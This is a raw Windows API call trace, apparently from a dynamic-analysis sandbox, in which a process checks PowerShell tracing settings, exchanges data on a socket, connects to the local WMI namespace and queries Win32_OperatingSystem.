	[0218.036] SetEvent (hEvent=0x4d8) returned 1
	[0218.036] SetEvent (hEvent=0x4e0) returned 1
	[0218.036] SetEvent (hEvent=0x4d8) returned 1
	[0218.036] SetEvent (hEvent=0x4e0) returned 1
	[0218.037] SetEvent (hEvent=0x4e0) returned 1
	[0218.038] SetEvent (hEvent=0x4e0) returned 1
	[0218.039] SetEvent (hEvent=0x4e0) returned 1
	[0218.058] GetCurrentProcess () returned 0xffffffffffffffff
	[0218.058] GetCurrentProcess () returned 0xffffffffffffffff
	[0218.058] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c80d068, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c80d068*=0x52c) returned 1
	[0218.060] CloseHandle (hObject=0x52c) returned 1
	[0218.065] GetExitCodeProcess (in: hProcess=0x4f8, lpExitCode=0x1c80d0d8 | out: lpExitCode=0x1c80d0d8*=0x0) returned 1
	[0218.073] CloseHandle (hObject=0x4f8) returned 1
	[0218.082] send (s=0x404, buf=0x3154848*, len=95, flags=0) returned 95
	[0218.083] recv (in: s=0x404, buf=0x30764f8, len=502, flags=0 | out: buf=0x30764f8*) returned 376
	[0218.330] VirtualQuery (in: lpAddress=0x1c80cce0, lpBuffer=0x1c80dba0, dwLength=0x30 | out: lpBuffer=0x1c80dba0*(BaseAddress=0x1c80c000, AllocationBase=0x1be80000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0218.338] CoTaskMemAlloc (cb=0x104) returned 0x1b824630
	[0218.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b824630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.338] CoTaskMemFree (pv=0x1b824630) 
	[0218.983] CoTaskMemAlloc (cb=0x104) returned 0x1b824630
	[0218.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b824630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.983] CoTaskMemFree (pv=0x1b824630) 
	[0219.628] CoGetObjectContext (in: riid=0x1c80cff8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cff0 | out: ppv=0x1c80cff0*=0x181868) returned 0x0
	[0219.628] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80d010 | out: pAptType=0x1c80d010*=1) returned 0x0
	[0219.628] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d118 | out: ppvObject=0x1c80d118*=0x0) returned 0x80004002
	[0219.628] IUnknown:Release (This=0x181868) returned 0x1
	[0219.631] CoGetClassObject (in: rclsid=0x1b802378*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80c680 | out: ppv=0x1c80c680*=0x1c831dc0) returned 0x0
	[0219.631] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c831dc0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c390 | out: ppvObject=0x1c80c390*=0x0) returned 0x80004002
	[0219.631] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c831dc0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c378 | out: ppvObject=0x1c80c378*=0x1c8360a0) returned 0x0
	[0219.631] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8360a0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c280 | out: ppvObject=0x1c80c280*=0x1c8360a0) returned 0x0
	[0219.631] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8360a0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c300 | out: ppvObject=0x1c80c300*=0x0) returned 0x80004002
	[0219.632] WbemDefPath:IUnknown:AddRef (This=0x1c8360a0) returned 0x3
	[0219.632] CoGetContextToken (in: pToken=0x1c80bf50 | out: pToken=0x1c80bf50) returned 0x0
	[0219.632] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8360a0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80bf10 | out: ppvObject=0x1c80bf10*=0x1b82be20) returned 0x0
	[0219.632] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b82be20, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80bf40 | out: pCid=0x1c80bf40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0219.632] WbemDefPath:IUnknown:Release (This=0x1b82be20) returned 0x3
	[0219.632] CoGetContextToken (in: pToken=0x1c80bf20 | out: pToken=0x1c80bf20) returned 0x0
	[0219.632] WbemDefPath:IUnknown:AddRef (This=0x1c8360a0) returned 0x4
	[0219.632] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8360a0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c038 | out: ppvObject=0x1c80c038*=0x0) returned 0x80004002
	[0219.633] WbemDefPath:IUnknown:Release (This=0x1c8360a0) returned 0x3
	[0219.633] WbemDefPath:IUnknown:Release (This=0x1c8360a0) returned 0x2
	[0219.633] WbemDefPath:IUnknown:Release (This=0x1c831dc0) returned 0x0
	[0219.820] WbemDefPath:IUnknown:Release (This=0x1c8360a0) returned 0x1
	[0219.821] CoGetContextToken (in: pToken=0x1c80cc50 | out: pToken=0x1c80cc50) returned 0x0
	[0219.821] CoGetContextToken (in: pToken=0x1c80cb90 | out: pToken=0x1c80cb90) returned 0x0
	[0219.821] WbemDefPath:IUnknown:AddRef (This=0x1c8360a0) returned 0x2
	[0219.821] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8360a0, riid=0x1c80ccd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80ccb0 | out: ppvObject=0x1c80ccb0*=0x1c8360a0) returned 0x0
	[0219.821] WbemDefPath:IUnknown:Release (This=0x1c8360a0) returned 0x2
	[0219.821] WbemDefPath:IUnknown:Release (This=0x1c8360a0) returned 0x1
	[0219.821] CoGetContextToken (in: pToken=0x1c80cdd0 | out: pToken=0x1c80cdd0) returned 0x0
	[0219.821] CoGetContextToken (in: pToken=0x1c80cd10 | out: pToken=0x1c80cd10) returned 0x0
	[0219.821] WbemDefPath:IUnknown:AddRef (This=0x1c8360a0) returned 0x2
	[0219.821] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8360a0, riid=0x1c80ce50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c80ce30 | out: ppvObject=0x1c80ce30*=0x1c8360a0) returned 0x0
	[0219.821] WbemDefPath:IUnknown:Release (This=0x1c8360a0) returned 0x2
	[0219.822] WbemDefPath:IUnknown:AddRef (This=0x1c8360a0) returned 0x3
	[0219.822] WbemDefPath:IWbemPath:SetText (This=0x1c8360a0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0219.822] WbemDefPath:IUnknown:Release (This=0x1c8360a0) returned 0x2
	[0219.822] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8360a0, puCount=0x1c80d0e0 | out: puCount=0x1c80d0e0*=0x2) returned 0x0
	[0219.822] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80d0e0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d0e0*=0x17, pszText=0x0) returned 0x0
	[0219.822] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80d0e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d0e0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0219.822] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8360a0, puCount=0x1c80d090 | out: puCount=0x1c80d090*=0x2) returned 0x0
	[0219.822] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80d090*=0x0, pszText=0x0 | out: puBuffLength=0x1c80d090*=0x17, pszText=0x0) returned 0x0
	[0219.822] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=4, puBuffLength=0x1c80d090*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80d090*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0219.822] CoGetObjectContext (in: riid=0x1c80cfc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cfc0 | out: ppv=0x1c80cfc0*=0x181868) returned 0x0
	[0219.822] IComThreadingInfo:GetCurrentApartmentType (in: This=0x181868, pAptType=0x1c80cfe0 | out: pAptType=0x1c80cfe0*=1) returned 0x0
	[0219.822] IUnknown:QueryInterface (in: This=0x181868, riid=0x303e038*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c80d0e8 | out: ppvObject=0x1c80d0e8*=0x0) returned 0x80004002
	[0219.823] IUnknown:Release (This=0x181868) returned 0x1
	[0219.823] CoGetClassObject (in: rclsid=0x1b8026f8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c80cc70 | out: ppv=0x1c80cc70*=0x1c83e120) returned 0x0
	[0219.823] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83e120, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c980 | out: ppvObject=0x1c80c980*=0x0) returned 0x80004002
	[0219.823] WbemLocator:IClassFactory:CreateInstance (in: This=0x1c83e120, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c968 | out: ppvObject=0x1c80c968*=0x1c83e140) returned 0x0
	[0219.823] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83e140, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c870 | out: ppvObject=0x1c80c870*=0x1c83e140) returned 0x0
	[0219.824] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83e140, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c8f0 | out: ppvObject=0x1c80c8f0*=0x0) returned 0x80004002
	[0219.824] WbemLocator:IUnknown:AddRef (This=0x1c83e140) returned 0x3
	[0219.824] CoGetContextToken (in: pToken=0x1c80c540 | out: pToken=0x1c80c540) returned 0x0
	[0219.824] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83e140, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c500 | out: ppvObject=0x1c80c500*=0x0) returned 0x80004002
	[0219.824] CoGetContextToken (in: pToken=0x1c80c510 | out: pToken=0x1c80c510) returned 0x0
	[0219.824] WbemLocator:IUnknown:AddRef (This=0x1c83e140) returned 0x4
	[0219.825] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83e140, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c628 | out: ppvObject=0x1c80c628*=0x0) returned 0x80004002
	[0219.825] WbemLocator:IUnknown:Release (This=0x1c83e140) returned 0x3
	[0219.825] WbemLocator:IUnknown:Release (This=0x1c83e140) returned 0x2
	[0219.825] WbemLocator:IUnknown:Release (This=0x1c83e120) returned 0x0
	[0219.825] WbemLocator:IUnknown:Release (This=0x1c83e140) returned 0x1
	[0219.825] CoGetContextToken (in: pToken=0x1c80cb30 | out: pToken=0x1c80cb30) returned 0x0
	[0219.825] CoGetContextToken (in: pToken=0x1c80ca70 | out: pToken=0x1c80ca70) returned 0x0
	[0219.825] WbemLocator:IUnknown:AddRef (This=0x1c83e140) returned 0x2
	[0219.825] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83e140, riid=0x1c80cbb0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c80cb90 | out: ppvObject=0x1c80cb90*=0x1c83e140) returned 0x0
	[0219.826] WbemLocator:IUnknown:Release (This=0x1c83e140) returned 0x2
	[0219.826] WbemLocator:IUnknown:Release (This=0x1c83e140) returned 0x1
	[0219.826] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8360a0, puCount=0x1c80cf90 | out: puCount=0x1c80cf90*=0x2) returned 0x0
	[0219.826] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=8, puBuffLength=0x1c80cf90*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cf90*=0x17, pszText=0x0) returned 0x0
	[0219.826] WbemDefPath:IWbemPath:GetText (in: This=0x1c8360a0, lFlags=8, puBuffLength=0x1c80cf90*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cf90*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0219.826] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c80cc80 | out: ppv=0x1c80cc80*=0x1c83e160) returned 0x0
	[0219.826] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c83e160, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c80cf10 | out: ppNamespace=0x1c80cf10*=0x1c83b2b8) returned 0x0
	[0220.622] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83b2b8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80caf8 | out: ppvObject=0x1c80caf8*=0x1b8083f0) returned 0x0
	[0220.622] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b8083f0, pProxy=0x1c83b2b8, pAuthnSvc=0x1c80caf0, pAuthzSvc=0x1c80caec, pServerPrincName=0x1c80cb18, pAuthnLevel=0x1c80cae8, pImpLevel=0x1c80cb04, pAuthInfo=0x1c80cb28, pCapabilites=0x1c80cb00 | out: pAuthnSvc=0x1c80caf0*=0xa, pAuthzSvc=0x1c80caec*=0x0, pServerPrincName=0x1c80cb18, pAuthnLevel=0x1c80cae8*=0x6, pImpLevel=0x1c80cb04*=0x2, pAuthInfo=0x1c80cb28, pCapabilites=0x1c80cb00*=0x1) returned 0x0
	[0220.622] WbemLocator:IUnknown:Release (This=0x1b8083f0) returned 0x1
	[0220.622] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83b2b8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca98 | out: ppvObject=0x1c80ca98*=0x1b808430) returned 0x0
	[0220.622] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83b2b8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca28 | out: ppvObject=0x1c80ca28*=0x1b8083f0) returned 0x0
	[0220.622] WbemLocator:IClientSecurity:SetBlanket (This=0x1b8083f0, pProxy=0x1c83b2b8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0220.623] WbemLocator:IUnknown:Release (This=0x1b8083f0) returned 0x2
	[0220.623] WbemLocator:IUnknown:Release (This=0x1b808430) returned 0x1
	[0220.623] CoTaskMemFree (pv=0x1b81eb60) 
	[0220.623] WbemLocator:IUnknown:Release (This=0x1c83e160) returned 0x0
	[0220.623] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83b2b8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c710 | out: ppvObject=0x1c80c710*=0x1b808430) returned 0x0
	[0220.623] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808430, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c790 | out: ppvObject=0x1c80c790*=0x0) returned 0x80004002
	[0220.626] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808430, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c528 | out: ppvObject=0x1c80c528*=0x0) returned 0x80004002
	[0220.627] WbemLocator:IUnknown:AddRef (This=0x1b808430) returned 0x3
	[0220.627] CoGetContextToken (in: pToken=0x1c80c3e0 | out: pToken=0x1c80c3e0) returned 0x0
	[0220.627] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808430, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c3a0 | out: ppvObject=0x1c80c3a0*=0x1b808318) returned 0x0
	[0220.628] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b808318, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c3d0 | out: pCid=0x1c80c3d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0220.628] WbemLocator:IUnknown:Release (This=0x1b808318) returned 0x3
	[0220.628] CoGetContextToken (in: pToken=0x1c80c3b0 | out: pToken=0x1c80c3b0) returned 0x0
	[0220.628] WbemLocator:IUnknown:AddRef (This=0x1b808430) returned 0x4
	[0220.628] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808430, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c4c8 | out: ppvObject=0x1c80c4c8*=0x1b808400) returned 0x0
	[0220.628] WbemLocator:IUnknown:Release (This=0x1b808430) returned 0x4
	[0220.628] WbemLocator:IRpcOptions:Query (in: This=0x1b808400, pPrx=0x1b808430, dwProperty=2, pdwValue=0x1c80c538 | out: pdwValue=0x1c80c538) returned 0x80004002
	[0220.629] WbemLocator:IUnknown:Release (This=0x1b808400) returned 0x3
	[0220.629] WbemLocator:IUnknown:Release (This=0x1b808430) returned 0x2
	[0220.629] CoGetContextToken (in: pToken=0x1c80c8b0 | out: pToken=0x1c80c8b0) returned 0x0
	[0220.629] CoGetContextToken (in: pToken=0x1c80c7f0 | out: pToken=0x1c80c7f0) returned 0x0
	[0220.629] WbemLocator:IUnknown:AddRef (This=0x1b808430) returned 0x3
	[0220.629] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808430, riid=0x1c80c930*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c80c910 | out: ppvObject=0x1c80c910*=0x1c83b2b8) returned 0x0
	[0220.629] WbemLocator:IUnknown:Release (This=0x1b808430) returned 0x3
	[0220.629] WbemLocator:IUnknown:Release (This=0x1c83b2b8) returned 0x2
	[0220.630] WbemLocator:IUnknown:Release (This=0x1c83b2b8) returned 0x1
	[0220.630] CoGetContextToken (in: pToken=0x1c80ceb0 | out: pToken=0x1c80ceb0) returned 0x0
	[0220.630] WbemLocator:IUnknown:AddRef (This=0x1b808430) returned 0x2
	[0220.630] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808430, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca80 | out: ppvObject=0x1c80ca80*=0x1b808430) returned 0x0
	[0220.630] WbemLocator:IUnknown:Release (This=0x1b808430) returned 0x2
	[0220.630] WbemLocator:IUnknown:Release (This=0x1b808430) returned 0x1
	[0220.630] CoGetContextToken (in: pToken=0x1c80cb50 | out: pToken=0x1c80cb50) returned 0x0
	[0220.631] CoGetContextToken (in: pToken=0x1c80ca90 | out: pToken=0x1c80ca90) returned 0x0
	[0220.631] WbemLocator:IUnknown:AddRef (This=0x1b808430) returned 0x2
	[0220.631] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808430, riid=0x1c80cbd0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c80cbb0 | out: ppvObject=0x1c80cbb0*=0x1c83b2b8) returned 0x0
	[0220.631] WbemLocator:IUnknown:Release (This=0x1b808430) returned 0x2
	[0220.631] WbemLocator:IUnknown:AddRef (This=0x1c83b2b8) returned 0x3
	[0220.631] IWbemServices:ExecQuery (in: This=0x1c83b2b8, strQueryLanguage="WQL", strQuery="select * from Win32_OperatingSystem", lFlags=16, pCtx=0x0, ppEnum=0x1c80d048 | out: ppEnum=0x1c80d048*=0x1c83c728) returned 0x0
	[0220.642] IUnknown:QueryInterface (in: This=0x1c83c728, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cc58 | out: ppvObject=0x1c80cc58*=0x1c83c730) returned 0x0
	[0220.642] IClientSecurity:QueryBlanket (in: This=0x1c83c730, pProxy=0x1c83c728, pAuthnSvc=0x1c80cc50, pAuthzSvc=0x1c80cc4c, pServerPrincName=0x1c80cc78, pAuthnLevel=0x1c80cc48, pImpLevel=0x1c80cc64, pAuthInfo=0x1c80cc88, pCapabilites=0x1c80cc60 | out: pAuthnSvc=0x1c80cc50*=0xa, pAuthzSvc=0x1c80cc4c*=0x0, pServerPrincName=0x1c80cc78, pAuthnLevel=0x1c80cc48*=0x6, pImpLevel=0x1c80cc64*=0x2, pAuthInfo=0x1c80cc88, pCapabilites=0x1c80cc60*=0x1) returned 0x0
	[0220.642] IUnknown:Release (This=0x1c83c730) returned 0x1
	[0220.642] IUnknown:QueryInterface (in: This=0x1c83c728, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cbf8 | out: ppvObject=0x1c80cbf8*=0x1b808130) returned 0x0
	[0220.642] IUnknown:QueryInterface (in: This=0x1c83c728, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cb88 | out: ppvObject=0x1c80cb88*=0x1c83c730) returned 0x0
	[0220.642] IClientSecurity:SetBlanket (This=0x1c83c730, pProxy=0x1c83c728, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0220.651] IUnknown:Release (This=0x1c83c730) returned 0x2
	[0220.651] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x1
	[0220.651] CoTaskMemFree (pv=0x1b81e5f0) 
	[0220.652] IUnknown:QueryInterface (in: This=0x1c83c728, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c830 | out: ppvObject=0x1c80c830*=0x1b808130) returned 0x0
